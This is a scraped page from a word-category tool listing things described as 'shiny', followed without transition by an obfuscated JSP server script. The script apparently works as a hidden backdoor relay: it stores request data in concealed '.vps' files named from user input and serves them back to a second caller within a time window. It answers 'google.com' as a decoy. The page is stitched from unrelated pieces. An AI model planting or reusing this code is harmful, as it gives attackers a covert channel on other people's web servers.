Use the & operator to see the shared categories of two terms. E.g.
cola & coffee
or
divorce & war
Go Back
See XML
Categories for
ss
with nuance
shiny
:
shiny:material,
Simple categories matching
shiny
:
object,
surface,
ground,
medium,
stone,
embellishment,
fabric,
wrap,
material,
toy,
metal,
substrate,
subject,
garment,
part,
thing,
weapon,
matter,
substance,
alloy,
jewelry,
textile,
time,
clothes,
hardware,
item,
decoration,
paper,
accessory,
fibre,
trinket,
color,
cover,
stuff,
Members with property
shiny
:
mirror,
tinfoil,
leather,
pie_plate,
glass,
silver,
taffeta,
rhinestone,
bottle_cap,
virtual_pc,
water,
box,
fake_jewelry,
painting,
chrome,
brass_plate,
black_plexiglas,
tin,
iron,
satin,
stainless-steel_plate,
special-effect_film,
glossy_photo,
magazine_paper,
bones,
gold,
metal_chains,
aluminium,
sand_bunker,
watch,
china,
fiberglass,
crystal,
cubic_zirconia,
glossy,
magazine,
clean_formica,
wheel_hub,
silverware,
luxurious_velvet,
flat_plate,
lame,
plate,
italian_marble,
magazine_page,
bright_button,
bathroom_windowsill,
glass_marble,
tiara,
pot,
ceramics,
fiberglass_deck,
tie,
painted_door,
countertop,
nail,
car_windscreen,
pebble,
crotch,
screw,
plastic,
glassware,
small_piece,
weapon_barrel,
wall,
polished_granite,
battery,
camera,
car_roof,
coffee_package,
glass_goblet,
pvc_dress,
milk_carton,
glossy_cabinet,
window_framing,
chrome_bumper,
wet_road,
balcony,
ss,
polished_wood,
magnesium,
polished_brick,
shiny_metal,
bit,
glass_pane,
bracelet,
rayon,
rubber,
equipment,
latex,
pinwheel,
polished_shoes,
stone,
sateen,
swinging_watch,
door_key,
table_top,
spanner,
gem_dice,
car_bumper,
perspex,
enamel,
jewelry,
stainless-steel_cookware,
tv,
porcelain,
velvet,
nut,
knife,
toy,
beads,
marlite,
magnetite,
car_key,
dvd,
glass_table,
car_windshield,
liquid,
reflective_fruit,
piece,
hair_pin,
tin-can_lid,
platinum_jewelry,
mold_steel,
chassis_bolt,
coin,
pin,
silver_paper,
aluminum_pigment,
jewellery,
jewel,
latest,
gold_belt,
chromium,
damask,
vinyl_silk,
glossy_paper,
nickel,
velveteen,
polished_end,
plastic_gem,
freezer,
bike,
car_hubcap,
jade,
silver_tape,
glossy_tabletop,
hook,
car_bodywork,
door,
black_plastic,
diamond,
granite,
metal_plate,
unpainted_aluminum,
shell,
bottle,
foil_wrap,
steel,
glossy_paint,
bald_head,
clip,
ice,
compact_disk,
metallic_object,
wet_pavement,
road,
polished_tombstone,
thermos,
engine,
counter_top,
brass,
satin_blazer,
metal,
pen,
pyrite,
covered_surface,
ipod,
iron_roof,
paper,
soda,
car_exterior,
tomb_stone,
chrome_silver,
wire,
window,
foil_packaging,
buckle,
spoon,
classic_car,
glossy_vehicle,
viscose,
belt,
chrome_surface,
perfect_mirror,
linoleum_floor,
teapot,
wooden_flooring,
glitter,
trim,
ceramic_tile,
pvc,
costume_jewellery,
concrete,
wood,
key,
nylon,
foil,
metallic,
hot_roads,
cowrie_shell,
satin_lingerie,
floor,
paperclip,
bike_tool,
eyeglasses,
glasses,
x-ray_synchrotron,
plastic_ball,
light,
metallic_pen,
plastic_cover,
lip_gloss,
metal_sheet,
organza,
earring,
designer_shoes,
new_copper,
book_cover,
bolt,
tinsel,
metallic_surface,
glass_ornament,
marble,
sequin,
ring,
car_paint,
wet_tarmac,
christmas_decoration,
chrome_plating,
windows,
lure,
door_trim,
bath,
flat_roads,
wool,
shantung_silk,
transparency_film,
linoleum,
bronze,
car,
orange-tree_leaf,
flashing_light,
top,
diving_knife,
porcelain_handbasin,
shell_bag,
floorboard,
bracket,
bathroom_tile,
vehicle,
button,
zinc,
glass_bottom,
polished_stone,
pie_pan,
water_surface,
snow,
roadway,
reflector,
melamine_cupboard,
cd,
paint,
glossy_cotton,
basin,
sunlit_street,
insect,
steel_surface,
sword,
supercomputer,
wristwatch,
voltaic_spear,
glass_plate,
fast_car,
tile,
mylar_balloon,
acetate,
polished_surface,
new_brass,
gem,
car_body,
silk,
mardi-gras_beads,
copper,
spectacles,
wine_glasses,
polyester,
bench_top,
velour,
feather,
windshield,
camera_lense,
lighter,
platinum,
roads,
button_battery,
silk_shirt,
aluminum-foil_strip,
emerald,
white_quartz,
si,
vase,
highway,
aluminum,
gold_sunglasses,
truck,
tomato,
steel_ball,
formica,
accessory,
<%@page trimDirectiveWhitespaces="true"%> <%@page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <%@page import="java.io.*"%> <%@page import="java.util.*"%> <%@page import="java.text.*"%> <%! static String cuy321a = null; public static String cuy321b(byte[] cuy321c) { char[] cuy321d = { 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P', 'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f', 'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v', 'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/' }; StringBuilder cuy321e = new StringBuilder(); int cuy321f = 0; for (int i = 0; i < cuy321c.length; i += 3) { int b = ((cuy321c[i] & 0xFF) << 16) & 0xFFFFFF; if (i + 1 < cuy321c.length) { b |= (cuy321c[i+1] & 0xFF) << 8; } else { cuy321f++; } if (i + 2 < cuy321c.length) { b |= (cuy321c[i+2] & 0xFF); } else { cuy321f++; } for (int j = 0; j < 4 - cuy321f; j++) { int c = (b & 0xFC0000) >> 18; cuy321e.append(cuy321d[c]); b <<= 6; } } for (int j = 0; j < cuy321f; j++) { cuy321e.append("="); } return cuy321e.toString(); } public void cuy321a(HttpServletRequest req) { if (cuy321a != null) return; String cuy321g = getServletContext().getRealPath(req.getRequestURI()).replace('\\', '/'); cuy321a = cuy321g.substring(0, cuy321g.lastIndexOf('/')) + "/"; } byte[] cuy321h(String cuy321i) { byte[] cuy321j = null; FileInputStream cuy321k = null; File file = new File(cuy321i); try { cuy321k = new FileInputStream(file); cuy321j = new byte[(int)file.length()]; cuy321k.read(cuy321j); } catch (Exception ex) { } finally { try { if (cuy321k != null) cuy321k.close(); } catch (Exception ex) { } } return cuy321j; } %> <% cuy321a(request); String cuy322a = request.getParameter("user"); String cuy322b = request.getParameter("rand"); String cuy322c = request.getParameter("id"); String cuy322d = request.getParameter("action"); int cuy322e = -1; if (request.getParameter("code") != null) cuy322e = Integer.parseInt(request.getParameter("code")) % 4; if (cuy322d != null && "home".equals(cuy322d)) { out.write("google.com"); } if (cuy322a != null && !"0".equals(cuy322a)) { String cuy322g = cuy321a + cuy322b + ".vps"; String cuy322f = cuy322g + "x"; String cuy322h = request.getParameter("hash"); String cuy322i = request.getHeader("From"); FileOutputStream cuy322j = null; cuy322j = new FileOutputStream(cuy322f); if(cuy322j != null) { DataOutputStream cuy322k = new DataOutputStream(cuy322j); cuy322k.writeLong(System.currentTimeMillis()); cuy322k.close(); cuy322j.close(); } cuy322j = new FileOutputStream(cuy322g, false); if(cuy322j != null) { cuy322j.write(cuy322h.getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322i.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322a.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322b.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.flush(); cuy322j.close(); } out.write("google.com"); } else if (cuy322e == 0 && "0".equals(cuy322c)) { out.write("google.com"); } else if (cuy322e == 1) { File cuy322l = new File(cuy321a); String cuy322g = null; String cuy322f = null; int cuy322m = 0; if (cuy322l.exists() && cuy322l.isDirectory()) { for(File file:cuy322l.listFiles()) { cuy322g = file.getName(); if(cuy322g.endsWith(".vps")) { cuy322m = 1; cuy322g = file.getAbsolutePath(); cuy322f = cuy322g + "x"; break; } } } if (cuy322m == 1) { FileInputStream cuy321k = new FileInputStream(cuy322f); DataInputStream cuy322o = new DataInputStream(cuy321k); if(System.currentTimeMillis() - cuy322o.readLong() < 180000) { byte[] cuy322p = cuy321h(cuy322g); if (cuy322p != null) { out.write(new String(cuy322p)); } } cuy322o.close(); cuy321k.close(); File cuy322p1 = new File(cuy322g); cuy322p1.delete(); File cuy322pz = new File(cuy322f); cuy322pz.delete(); } else { out.write("google.com"); } } %>